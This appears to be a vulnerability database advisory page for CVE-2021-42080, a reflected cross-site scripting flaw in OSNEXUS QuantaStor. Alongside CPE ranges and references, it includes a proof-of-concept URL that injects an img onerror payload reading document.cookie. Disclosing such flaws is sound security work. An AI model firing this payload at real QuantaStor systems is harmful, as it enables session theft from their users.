High severity7.4NVD Advisory· Published Jul 10, 2023· Updated Jun 17, 2026
CVE-2021-42080
CVE-2021-42080
Description
An attacker is able to launch a Reflected XSS attack using a crafted URL.
POC:
Visit the following URL https://:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
3cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*+ 1 more
- cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*range: <6.0.0.355
- (no CPE)range: 0
Patches
Vulnerability mechanics
References
5- csirt.divd.nl/CVE-2021-42080nvdThird Party Advisory
- www.wbsec.nl/osnexusnvdThird Party Advisory
- www.osnexus.com/products/software-defined-storagenvdProduct
- csirt.divd.nl/DIVD-2021-00020/nvd
- www.divd.nl/DIVD-2021-00020nvd
News mentions
0No linked articles in our index yet.